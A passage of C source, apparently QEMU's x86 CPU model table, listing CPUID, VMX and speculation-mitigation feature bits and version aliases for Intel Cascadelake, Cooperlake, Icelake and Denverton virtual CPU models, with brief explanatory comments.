VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .xlevel = 0x80000008, .model_id = "Intel Xeon Processor (Cascadelake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .props = (PropValue[]) { { "arch-capabilities", "on" }, { "rdctl-no", "on" }, { "ibrs-all", "on" }, { "skip-l1dfl-vmentry", "on" }, { "mds-no", "on" }, { NULL /* end of list */ } }, }, { .version = 3, .alias = "Cascadelake-Server-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { NULL /* end of list */ } }, }, { 0 /* end of list */ } } }, { .name = "Cooperlake", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 85, .stepping = 10, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | 
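/*
 * Note on the speculation-related properties (summary): "arch-capabilities"
 * exposes the IA32_ARCH_CAPABILITIES MSR, and props such as "rdctl-no",
 * "ibrs-all", "skip-l1dfl-vmentry", "mds-no", "pschange-mc-no" and "taa-no"
 * set the corresponding MSR_ARCH_CAP_* bits, which tell the guest which
 * speculative-execution issues the vCPU claims to be immune to. Cascadelake
 * gains them in its -v2 props above; Cooperlake below bakes the same bits
 * into its base FEAT_ARCH_CAPABILITIES word.
 */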
CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512DQ | CPUID_7_0_EBX_AVX512BW | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512VL | CPUID_7_0_EBX_CLFLUSHOPT, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_PKU | CPUID_7_0_ECX_AVX512VNNI, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_STIBP | CPUID_7_0_EDX_SPEC_CTRL_SSBD | CPUID_7_0_EDX_ARCH_CAPABILITIES, .features[FEAT_ARCH_CAPABILITIES] = MSR_ARCH_CAP_RDCL_NO | MSR_ARCH_CAP_IBRS_ALL | MSR_ARCH_CAP_SKIP_L1DFL_VMENTRY | MSR_ARCH_CAP_MDS_NO | MSR_ARCH_CAP_PSCHANGE_MC_NO | MSR_ARCH_CAP_TAA_NO, .features[FEAT_7_1_EAX] = CPUID_7_1_EAX_AVX512_BF16, /* * Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. 
*/ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Xeon Processor (Cooperlake)", }, { .name = "Icelake-Client", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 126, .stepping = 0, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | 
CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_8000_0008_EBX] = CPUID_8000_0008_EBX_WBNOINVD, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_AVX512_VBMI | CPUID_7_0_ECX_UMIP | CPUID_7_0_ECX_PKU | CPUID_7_0_ECX_AVX512_VBMI2 | CPUID_7_0_ECX_GFNI | CPUID_7_0_ECX_VAES | CPUID_7_0_ECX_VPCLMULQDQ | CPUID_7_0_ECX_AVX512VNNI | CPUID_7_0_ECX_AVX512BITALG | CPUID_7_0_ECX_AVX512_VPOPCNTDQ, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_SPEC_CTRL_SSBD, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, 
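/*
 * Reminder (summary): VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS is the gate
 * for the FEAT_VMX_SECONDARY_CTLS word that follows; per the Intel SDM the
 * secondary processor-based controls are consulted only when this bit of the
 * primary controls is 1, which is why every model advertising secondary
 * controls also sets it in FEAT_VMX_PROCBASED_CTLS.
 */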
.features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Core Processor (Icelake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Icelake-Client-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { NULL /* end of list */ } }, }, { 0 /* end of list */ } } }, { .name = "Icelake-Server", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 134, .stepping = 0, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_8000_0008_EBX] = CPUID_8000_0008_EBX_WBNOINVD, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512DQ | CPUID_7_0_EBX_AVX512BW | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512VL | CPUID_7_0_EBX_CLFLUSHOPT, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_AVX512_VBMI | CPUID_7_0_ECX_UMIP | CPUID_7_0_ECX_PKU | CPUID_7_0_ECX_AVX512_VBMI2 | CPUID_7_0_ECX_GFNI | CPUID_7_0_ECX_VAES | CPUID_7_0_ECX_VPCLMULQDQ | CPUID_7_0_ECX_AVX512VNNI | CPUID_7_0_ECX_AVX512BITALG | CPUID_7_0_ECX_AVX512_VPOPCNTDQ | CPUID_7_0_ECX_LA57, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_SPEC_CTRL_SSBD, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. 
*/ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS, .xlevel = 0x80000008, .model_id = "Intel Xeon Processor (Icelake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Icelake-Server-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { NULL /* end of list */ } }, }, { .version = 3, .props = (PropValue[]) { { "arch-capabilities", "on" }, { "rdctl-no", "on" }, { "ibrs-all", "on" }, { "skip-l1dfl-vmentry", "on" }, { "mds-no", "on" }, { "pschange-mc-no", "on" }, { "taa-no", "on" }, { NULL /* end of list */ } }, }, { 0 /* end of list */ } } }, { .name = "Denverton", .level = 21, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 95, .stepping = 1, .features[FEAT_1_EDX] = CPUID_FP87 | CPUID_VME | CPUID_DE | CPUID_PSE | CPUID_TSC | CPUID_MSR | CPUID_PAE | CPUID_MCE | 
CPUID_CX8 | CPUID_APIC | CPUID_SEP | CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | CPUID_PSE36 | CPUID_CLFLUSH | CPUID_MMX | CPUID_FXSR | CPUID_SSE | CPUID_SSE2, .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16 | CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_X2APIC | CPUID_EXT_MOVBE | CPUID_EXT_POPCNT | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_AES | CPUID_EXT_XSAVE | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_SYSCALL | CPUID_EXT2_NX | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_LM, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_MPX | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT | CPUID_7_0_EBX_SHA_NI, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_ARCH_CAPABILITIES | CPUID_7_0_EDX_SPEC_CTRL_SSBD, /* * Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_ARCH_CAPABILITIES] = MSR_ARCH_CAP_RDCL_NO | MSR_ARCH_CAP_SKIP_L1DFL_VMENTRY, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | 